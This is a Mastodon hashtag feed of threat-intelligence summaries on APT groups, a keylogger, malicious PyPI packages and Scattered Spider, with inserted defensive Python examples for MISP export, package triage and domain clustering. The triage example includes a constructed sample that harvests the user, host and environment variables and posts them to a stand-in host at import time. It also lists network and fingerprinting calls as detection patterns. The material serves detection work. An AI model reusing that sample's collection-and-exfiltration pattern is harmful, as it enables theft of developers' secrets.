dmv.community is one of the many independent Mastodon servers you can use to participate in the fediverse.
A small regional Mastodon instance for those in the DC, Maryland, and Virginia areas. Local news, commentary, and conversation.


#threatdetection


Good day everyone!

An APT group known as Angry Likho (a.k.a. Sticky Werewolf) is being monitored by Kaspersky's Securelist researchers, and they have identified hundreds of victims of a recent attack in Russia, several in Belarus, and additional incidents in other countries. They used the age-old technique of spear-phishing to gain initial access; the emails carried various attachments that contained the legitimate bait file as well as other files, in some cases malicious LNK files. Execution would lead to a newly discovered implant named FrameworkSurvivor.exe.

As usual, check out all the juicy details that I left out and enjoy the read! Happy Hunting!

Angry Likho: Old beasts in a new forest
securelist.com/angry-likho-apt

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday


Good day everyone!

Fortinet's FortiGuard Labs discovered a new variant of the #Snake keylogger, a.k.a. "404 Keylogger". According to the report, most of the detections from their "FortiSandbox" have come from China, Turkey, Indonesia, Taiwan, and Spain, but if you aren't from these countries, you still may be a target!

Behaviors (MITRE ATT&CK):
Persistence - TA0003:
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - T1547.001 - After the malware is executed, it drops a copy of itself in the %Local_AppData%\supergroup directory and then copies itself to the %Startup% folder.

Defense Evasion - TA0005:
Process Injection: Process Hollowing - T1055.012 - The malware injects itself into a legitimate .NET process, in this sample RegSvcs.exe. This allowed it to run within a trusted process to evade detection.

Command And Control - TA0011:
Application Layer Protocol: Web Protocols - T1071.001
Application Layer Protocol: Mail Protocols - T1071.003

The malware used multiple techniques to upload stolen credentials. The researchers observed SMTP, Telegram bots, and HTTP Post requests to transmit the data.

As usual, go check out the research for yourself to check out the details that I left out and support the good work! Enjoy and Happy Hunting!

FortiSandbox 5.0 Detects Evolving Snake Keylogger Variant
fortinet.com/blog/threat-resea

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday


Good day everyone, new Blizzard has dropped!

Microsoft's Threat Intelligence shares their research on a Russian state actor dubbed #SeashellBlizzard! Part of the GRU, they specialize in operations ranging from espionage to information operations and cyber-enabled disruptions, which have resulted in destructive attacks and manipulation of ICS. They have leveraged different types of malware, including #KillDisk, #FoxBlade, and #NotPetya.

Behavior Summary (With MITRE ATT&CK):
Initial Access - TA0001:
Exploit Public-Facing Application - T1190
Seashell Blizzard commonly exploited vulnerable public facing infrastructure.

Persistence - TA0003:
Create or Modify System Process: Windows Service - T1543.003 -
Among other means of persistence, Seashell Blizzard created a system service.

Execution - TA0002:
Command and Scripting Interpreter: PowerShell - T1059.001
Command and Scripting Interpreter: Windows Command Shell - T1059.003
Seashell Blizzard abused both of these living-off-the-land binaries for multiple purposes, using many different parameters.

As always, there are WAAAAY too many technical details here, so go check it out yourself! Enjoy the read and Happy Hunting!

The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation
microsoft.com/en-us/security/b

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday


🚀 Kunai pushes further integration with MISP!

This week, we've made significant progress in bridging Kunai with @misp to enhance threat intelligence sharing. Our focus has been on developing kunai-to-misp, a new tool available at github.com/kunai-project/pykun, which processes Kunai logs and creates MISP events to streamline collaboration.

With this, it is now possible to both update MISP from Kunai and feed Kunai from MISP using the misp-to-kunai tool. Here's a practical workflow example:

1️⃣ Analyze a #linux malware sample with Kunai Sandbox (github.com/kunai-project/sandb)
2️⃣ Use kunai-to-misp on the collected Kunai logs
3️⃣ (Optional) Review attributes' IDS flag to maximize detections and reduce false positives
4️⃣ Use misp-to-kunai to distribute the results across all Kunai endpoints

Additionally, we're leveraging MISP’s data model to craft meaningful MISP objects and relationships, offering a clear visual representation of events inside MISP.

🔗 Try it out and let us know what you think!
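The workflow in the post above (Kunai logs in, MISP event out, IDS flags reviewed before distribution) as an added example in Python. This is not code from the kunai-project or from the kunai-to-misp tool: the Kunai field names (info.event.name, data.exe.*, data.dst.*), the log lines and the hashes are constructed for illustration and may differ from real Kunai output, and the event is built as the plain JSON layout MISP accepts rather than through PyMISP so it runs offline.

```python
"""Turn Kunai-style JSON event logs into a MISP event with per-attribute
IDS flags. Added example, not the kunai-to-misp tool. Field names and the
sample log below are constructed and may not match real Kunai output."""
import json
from datetime import datetime, timezone

# Constructed sample: three execve events and one connect event from a
# hypothetical sandbox run of a malicious ELF (hashes are made up).
KUNAI_LOG = r'''
{"info":{"event":{"name":"execve"}},"data":{"exe":{"path":"/usr/bin/bash","md5":"a1b2c3d4e5f60718293a4b5c6d7e8f90","sha256":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"},"command_line":"bash -c /tmp/.x/payload"}}
{"info":{"event":{"name":"execve"}},"data":{"exe":{"path":"/tmp/.x/payload","md5":"ffeeddccbbaa99887766554433221100","sha256":"deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef"},"command_line":"/tmp/.x/payload --daemon"}}
{"info":{"event":{"name":"connect"}},"data":{"dst":{"ip":"198.51.100.23","port":4444},"exe":{"path":"/tmp/.x/payload"}}}
{"info":{"event":{"name":"execve"}},"data":{"exe":{"path":"/usr/bin/ls","md5":"11111111111111111111111111111111","sha256":"1111111111111111111111111111111111111111111111111111111111111111"},"command_line":"ls -la /tmp/.x"}}
'''

# Binaries that ship with every distro: exporting their hashes as IDS
# indicators would fire on every host, so they are kept with to_ids=False.
BENIGN_PATH_PREFIXES = ("/usr/bin/", "/bin/", "/usr/sbin/", "/sbin/")


def is_noisy_path(path):
    return path.startswith(BENIGN_PATH_PREFIXES)


def parse_kunai(log_text):
    return [json.loads(line) for line in log_text.splitlines() if line.strip()]


def kunai_to_misp_event(events, info="Kunai sandbox run"):
    """Build a MISP-shaped event dict (the JSON layout PyMISP would POST).
    Returned, not uploaded, so the to_ids flags can be reviewed first."""
    attributes = []
    seen = set()

    def add(atype, value, to_ids, comment=""):
        if (atype, value) in seen:          # one attribute per (type, value)
            return
        seen.add((atype, value))
        attributes.append({"type": atype, "value": value,
                           "to_ids": to_ids, "comment": comment})

    for ev in events:
        name = ev["info"]["event"]["name"]
        data = ev["data"]
        exe = data.get("exe", {})
        path = exe.get("path", "")
        if name == "execve":
            noisy = is_noisy_path(path)
            add("filename", path, to_ids=not noisy, comment="execve")
            for algo in ("md5", "sha256"):
                if algo in exe:
                    add(algo, exe[algo], to_ids=not noisy, comment=f"hash of {path}")
            # Command lines are analyst context, never IDS indicators.
            if "command_line" in data:
                add("text", data["command_line"], to_ids=False, comment="command line")
        elif name == "connect":
            dst = data["dst"]
            add("ip-dst|port", f"{dst['ip']}|{dst['port']}", to_ids=True,
                comment=f"connect from {path}")
            add("ip-dst", dst["ip"], to_ids=True, comment=f"connect from {path}")

    return {"Event": {
        "info": info,
        "date": datetime.now(timezone.utc).strftime("%Y-%m-%d"),
        "distribution": 0,        # your organisation only
        "threat_level_id": 2,     # medium
        "analysis": 1,            # ongoing
        "Attribute": attributes,
    }}


def ids_values(event):
    """Values that would reach endpoints as detection indicators (to_ids=True)."""
    return sorted(a["value"] for a in event["Event"]["Attribute"] if a["to_ids"])


if __name__ == "__main__":
    event = kunai_to_misp_event(parse_kunai(KUNAI_LOG))
    print(json.dumps(event, indent=2))
    print("IDS indicators:", ids_values(event))
```

The point of step 3 in the post is visible in the output: the dropped binary, its hashes and the C2 socket carry to_ids=True, while /usr/bin/bash, /usr/bin/ls and the command lines stay as context only, so pushing the event back out to endpoints does not turn every shell launch into an alert.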

Good day everyone!

While #DeepSeek is making headlines as a competitor to the leading AI tools, bad actors are taking advantage of the hype. Positive Technologies' Supply Chain Security Team detected and prevented a malicious campaign in the Python Package Index (PyPI). The targets were developers, ML engineers, and ordinary AI enthusiasts who were looking into DeepSeek. They noticed a user uploaded two packages, deepseeek and deepseekai, that contained functions to collect user and computer data and steal environment variables from its victims.

Go check out the article for the rest of the technical details and this is a nice example of the good guys getting a win, your work is much appreciated! Enjoy and Happy Hunting!

Malicious packages deepseeek and deepseekai published in Python Package Index

global.ptsecurity.com/analytic

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

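A static triage check for the behaviour the post above describes (a package that fingerprints the user and host, copies the whole environment, and sends it off-host when imported or installed), as an added example. It is not the packages' code or Positive Technologies' tooling: the two package sources below are constructed, the malicious one only imitates the described pattern, and the lists of fingerprinting, environment and network calls are an assumed starting set, not a complete one.

```python
"""AST-based triage of a Python package source for the pattern: host/user
fingerprinting + bulk environment harvesting + network egress at import
time. Added example; SUSPICIOUS_SOURCE is constructed and is not the code
of the deepseeek/deepseekai packages."""
import ast

# Constructed sample resembling a malicious __init__.py / setup.py.
SUSPICIOUS_SOURCE = '''
import os, platform, getpass, socket
from urllib import request

def _collect():
    return {
        "user": getpass.getuser(),
        "host": socket.gethostname(),
        "os": platform.platform(),
        "env": dict(os.environ),
    }

def _send(payload):
    request.urlopen("http://example.invalid/collect", data=str(payload).encode())

_send(_collect())
'''

# Constructed benign sample: reads one named key, sends nothing anywhere.
BENIGN_SOURCE = '''
import os

def api_key():
    return os.environ.get("DEEPSEEK_API_KEY")
'''

# Assumed starting sets. Each call is common on its own; the combination
# at module import time is what looks like a collection stager.
FINGERPRINT_CALLS = {"getpass.getuser", "socket.gethostname", "platform.platform",
                     "platform.uname", "platform.node", "os.getlogin"}
ENV_ACCESS = {"os.environ"}
NETWORK_CALLS = {"request.urlopen", "urllib.request.urlopen", "requests.post",
                 "requests.get", "socket.socket", "http.client.HTTPConnection"}


def dotted(node):
    """Render an ast.Attribute/ast.Name chain such as `os.environ` as a string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan(source):
    tree = ast.parse(source)
    report = {"fingerprint": set(), "env": set(), "network": set(),
              "bulk_env": False, "import_time_calls": 0}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted(node.func)
            # dict(os.environ): the whole environment copied, not one key looked up
            if name == "dict" and node.args and dotted(node.args[0]) == "os.environ":
                report["bulk_env"] = True
        elif isinstance(node, ast.Attribute):
            name = dotted(node)
        else:
            continue
        for bucket, names in (("fingerprint", FINGERPRINT_CALLS),
                              ("env", ENV_ACCESS), ("network", NETWORK_CALLS)):
            if name in names:
                report[bucket].add(name)
    # Bare top-level calls run on `import` (or during `pip install` for setup.py).
    report["import_time_calls"] = sum(
        1 for s in tree.body if isinstance(s, ast.Expr) and isinstance(s.value, ast.Call))
    return report


def verdict(report):
    collects = report["bulk_env"] or bool(report["fingerprint"])
    if collects and report["network"] and report["import_time_calls"]:
        return "malicious"     # collects host/env data and ships it on import
    if collects and report["network"]:
        return "suspicious"    # same capability, but only when a function is called
    return "ok"


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SOURCE), ("benign", BENIGN_SOURCE)):
        r = scan(src)
        print(label, "->", verdict(r), {k: sorted(v) if isinstance(v, set) else v
                                         for k, v in r.items()})
```

The benign sample touches os.environ too, which is why a single indicator is not enough: the check only escalates when environment or host data collection is paired with network egress, and to "malicious" when that happens from a top-level statement that executes the moment the package is imported or installed.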

#WorkSurveillance #Surveillance #WageSlavery #SIEM #UEBA #CyberSecurity #ThreatDetection #BehaviorProfiling: "This case study explores, examines and documents how employers can use software that analyzes extensive personal data on employee behavior and communication for cybersecurity, insider threat detection and compliance purposes. To illustrate wider practices, it investigates software for “security information and event management” (SIEM), “user and entity behavior analytics” (UEBA), insider risk management and communication monitoring from two major vendors. First, it looks into cybersecurity and risk profiling systems offered by Forcepoint, a software vendor that was until recently owned by the US defense giant Raytheon. Second, it investigates in detail how employers can use cybersecurity and risk profiling software sold by Microsoft, whose “Sentinel” and “Purview” systems provide SIEM, UEBA, insider risk management and communication monitoring functionality. Combined, these systems can monitor everything employees do or say, profile their behavior and single them out for further investigation. Similar to predictive policing technologies, they promise not only to detect incidents but to prevent them before they occur. While organizations can use these software systems for legitimate purposes, this study focuses on their potential implications for employees."

crackedlabs.org/en/data-work/p


Scattered Spider continues its operations despite high-profile arrests. These arrests have pushed the group to iterate and adopt new tactics, including using different domain name patterns to target new employees unfamiliar with security protocols.

govinfosecurity.com/tracking-e

🔍 Key Insights from Malachi Walker, Security Adviser at DomainTools:
🔹 The group’s decentralized structure allows it to remain resilient and operational.
🔹Analyzing domain registrations and IP addresses can uncover connections between campaigns and aid law enforcement.
🔹Knowing when a domain was created helps narrow down the compromise window and block associated domains.

📽️ Watch Malachi Walker’s interview at DEF CON 2024 with Information Security Media Group (ISMG) to learn more about:
🔹Scattered Spider’s decentralized operations
🔹The importance of a domain activity timeline
🔹Proactive threat detection and incident response

Stay vigilant and proactive! 🛡️

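The two analytic steps from the interview summary above (pivoting on registration data to link lookalike domains across campaigns, and using creation dates to bound the compromise window) as an added example in Python. This is not DomainTools' tooling or anything from the interview: the WHOIS-style records, the brand name "examplecorp", the hosting IPs and the lure words used for the lookalike patterns are all constructed for illustration.

```python
"""Link lookalike domains through shared infrastructure and bound the
compromise window from creation dates. Added example; the records, brand
name and lure-word patterns below are constructed assumptions."""
from collections import defaultdict
from datetime import date

# Constructed records: (domain, created, registrar, name server, hosting IP).
RECORDS = [
    ("examplecorp-sso.com",      date(2024, 5, 2),  "RegistrarA", "ns1.cheapdns.invalid", "203.0.113.10"),
    ("examplecorp-helpdesk.net", date(2024, 5, 3),  "RegistrarA", "ns1.cheapdns.invalid", "203.0.113.10"),
    ("examplecorp-okta.com",     date(2024, 5, 9),  "RegistrarB", "ns1.cheapdns.invalid", "203.0.113.11"),
    ("examplecorp.com",          date(2009, 1, 15), "RegistrarC", "ns1.examplecorp.com",  "198.51.100.5"),
    ("otherbrand-vpn.com",       date(2024, 5, 9),  "RegistrarB", "ns2.other.invalid",    "203.0.113.11"),
]

# Assumed lookalike shape: <brand>-<lure word> under any TLD.
LURE_WORDS = ("sso", "okta", "helpdesk", "vpn", "hr", "corp")


def lookalikes(records, brand):
    """Domains that wrap the brand in a lure pattern, excluding the brand's own."""
    hits = []
    for dom, *_ in records:
        label = dom.split(".")[0]
        if label == brand:
            continue
        if label.startswith(brand + "-") and label[len(brand) + 1:] in LURE_WORDS:
            hits.append(dom)
    return hits


def cluster_by_infrastructure(records):
    """Union-find over shared name servers and hosting IPs: domains that share
    either end up in one cluster, which is how a lure aimed at one brand gets
    tied to lures aimed at another."""
    parent = {r[0]: r[0] for r in records}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    def union(a, b):
        parent[find(a)] = find(b)

    by_key = defaultdict(list)
    for dom, _, _, ns, ip in records:
        by_key[("ns", ns)].append(dom)
        by_key[("ip", ip)].append(dom)
    for doms in by_key.values():
        for other in doms[1:]:
            union(doms[0], other)
    clusters = defaultdict(set)
    for dom in parent:
        clusters[find(dom)].add(dom)
    return [sorted(c) for c in clusters.values()]


def compromise_window(records, domains, today_iso):
    """Earliest creation date among the linked domains is the earliest point
    lures could have gone out. Returns (earliest ISO date, days of exposure)."""
    created = min(c for d, c, *_ in records if d in domains)
    return created.isoformat(), (date.fromisoformat(today_iso) - created).days


if __name__ == "__main__":
    hits = lookalikes(RECORDS, "examplecorp")
    cluster = next(c for c in cluster_by_infrastructure(RECORDS) if hits[0] in c)
    print("lookalikes:", hits)
    print("linked infrastructure cluster:", cluster)
    print("compromise window starts:", compromise_window(RECORDS, cluster, "2024-06-01"))
```

On the constructed data the name-pattern check alone finds the three examplecorp lures, while the infrastructure pivot also pulls in otherbrand-vpn.com through the shared hosting IP; the window is then measured from the oldest domain in that cluster rather than from the one that happened to be reported, and every domain in the cluster is a candidate for blocking.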